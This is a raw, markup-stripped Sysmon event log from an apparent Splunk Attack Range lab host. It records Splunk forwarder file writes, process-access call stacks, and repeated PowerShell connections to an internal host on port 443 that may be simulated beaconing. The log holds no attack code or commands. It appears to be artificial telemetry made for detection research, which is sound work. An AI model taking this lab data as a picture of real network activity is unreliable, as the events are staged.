23542300x800000000000000035085075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BD0CA15F38897211AC72C11E8BB39395,SHA256=A54C43178D4512C577AFD9D6BCF76D8338556513E65B44A2AC7475D7DCB96829,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FA1AC7BBBABC40A837977B34FFA86D6,SHA256=237FC739E2A456AAFD274A21429633BEFDB598439611FA7413E39EFD706031E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:53.175{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56693-false10.0.1.12-8000- 10341000x800000000000000035085072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.270{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:28.268{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.268{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.267{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.252{B81B27B7-4F04-613A-5390-03000000C801}648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:53.575{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56694-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D29BE9204BAB1A511C5218C3477CF88C,SHA256=DC6C71F844EF34E1D96ADEC3B519B468BF7325F957B12C85498F7B6A8BFD7737,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.272{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C90FE35C7C492EA6BB430D8FA8BF4D30,SHA256=72376994D9E51EA2B6CF0D4C7A44C91B13C272C803A621A7459161B32AC98944,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.272{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF780A266475B26DF45F1F93A4F49B0B,SHA256=1DF7CC580AEEABAF877163613D421FA80FCF30A6F6F54F30CA0EA2919B324FC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.119{B81B27B7-4F04-613A-5490-03000000C801}65322812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:30.666{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C08145419FEE5A0412F5FA33183B123,SHA256=A5A61D1C99C584131C99E033DCDA26B1D993A0D1893B2C230024932FFA9BEBA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:31.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079F5F891F63B9A19ABB25E2B0D46C76,SHA256=AA879F331879335B6BF24D229830283A9EEB7009E2C689F7A9187D284F40C0E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:32.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CCCF4A12067417DCEE77C23EC4DBAF,SHA256=BE61FA0AF5CECDCE86C31443C04F95EAB7FD85AF4678BD674E4B822470597F92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:32.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=114148097D503F29CD3361914663A85E,SHA256=FA16905828326864A137E13CFED901E806C65229E27AE111FA777908D4FEFAC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:57.587{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56695-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:33.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A204207E8BEB5C18CB4341591982F1,SHA256=B43067DAF44FFF27E7C1A5EE6535AC314A3B5806A450CD2F500D1350E33AC4D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:34.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6A350B4471D9A9B29C8DA45548E6270,SHA256=CEBA3B6D46B8D5E8B1C0A6867E6EF2CDC43F08C9218F91C9624372FFE6BC4EF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:59.085{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56696-false10.0.1.12-8000- 23542300x800000000000000035085097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:35.835{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5223B2B4F4000A96C724E9AEF4919D9,SHA256=42B25C519552D6C0868D2A77DA68580E8DFABB6A1F24312FE53EF8A4F69B54E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:36.849{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24954454F49A4AC7ADC5D97CF1D0F405,SHA256=14A774DB36A380E0728162ABBBD463F957203EA448D0389FB161DC37C0B97DC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:36.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0340F02F5F6E55DD6A93745333D64821,SHA256=4B26BABEF2FFC5C254DE34EA38EBD221F210E2D021874C5FD9C26B8E5EAC8E7F,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035085098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:36.419{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=680DA3F006AA8D4315343D6C814D609D,SHA256=E38339212FA434424CFC7BBDDB3CE3774B5189701D833D74667C8B379ED9CD27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:01.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56697-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:37.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEC9D4B8FED0FE2690823C2C0E5C7D6,SHA256=44A20ED1F0D4702EAA7637A4A875ABEE3EC3A09D265DDF842CE05A7B3F602713,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19970E8B4BDCD35B949EF202D61A0FB9,SHA256=E470DCC9B3EB57F61BBE67E1F94D2F18544847A539C6ADA8D0E72D56D8502812,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.401{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.401{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=35EE875FCA887EB56F2CF40FB13F6B01,SHA256=27FA5FB7568F0DDADABA6D5F4570FA3068C68782125F4ACBC420C88804F8733C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.124{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56698-false10.0.1.12-8000- 23542300x800000000000000035085106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:39.915{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=637661A8B457408BCC76210B086818E6,SHA256=72410925848A096FCD482ACFD6B7476AE9B94E06EF17AFE6878C8404BC0EA598,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:40.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD92E51693B2B5F19D4CC2D4A6161CB,SHA256=D68E9C0C8D14E156D0FBC6BE44C2AD7854CA4935FB53348C74A2F9278604C05C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035085110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:14:41.681{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5a6-0x8f3a0fe7) 23542300x800000000000000035085109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:41.597{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4C83F92EC40EC941C0CDF0AC83DDD89A,SHA256=4AC71DB3A485A13413D10A43DF191300487144F41075FF9AA4BD4994833F4B0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:06.606{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56699-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:42.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F48C6F6802063817F16DDBAAD32181B,SHA256=69F6E5C22A1D9243B4C93F3B3FE85184D6B6134E443A3FA1294ED94FE00A184D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.761{B81B27B7-4F13-613A-5590-03000000C801}9647036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
